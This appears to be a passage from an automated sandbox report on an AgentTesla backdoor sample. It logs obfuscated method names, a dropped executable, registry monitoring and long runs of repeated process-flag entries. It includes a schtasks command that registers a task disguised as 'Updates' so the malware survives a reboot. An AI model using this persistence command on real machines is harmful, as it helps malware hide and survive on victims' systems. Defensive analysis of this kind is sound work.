Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, wr8FhtmFUUlBxtUbss.cs	High entropy of concatenated method names: 'Yrr5BUbZ9r', 'Crd5aJjO3I', 'y1C5gH21NB', 'EIF57wrcQq', 'Gyt5ewQY6R', 'Ss65dHaoAp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, fuQMSDTExTVdQxuWmx.cs	High entropy of concatenated method names: 'GdvrevwMJP', 'xg5r9IuFpM', 'KxKrIYKUpr', 'MNlrc1BGHQ', 'EJTrKgI4ZJ', 'P9frwVhsw5', 'kjxrPUqqA7', 'LUTrQ6K6ti', 'Il7rmTKDqR', 'gxprC3uOVb'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, wFgXhBBhqABw7ofaB4.cs	High entropy of concatenated method names: 'Syjy3fIvuh', 'GRayrxxoH3', 'IRhyfwAIjy', 'FWRyGMq1Q7', 'qVayONTZOL', 'ckdfKO83a3', 'y1Mfwj9FrR', 'rEvfPijp2n', 'PRmfQoNRET', 'oqrfmytAHL'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, qJH2QNzoQPomgCg9yF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l1NYLUc88O', 'R2PYjOpswk', 'u8TYiMTGf5', 'WDNYFoMZoh', 'Q4KY5RJ8j6', 'DffYY0V8I9', 'EUsYscLopu'

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
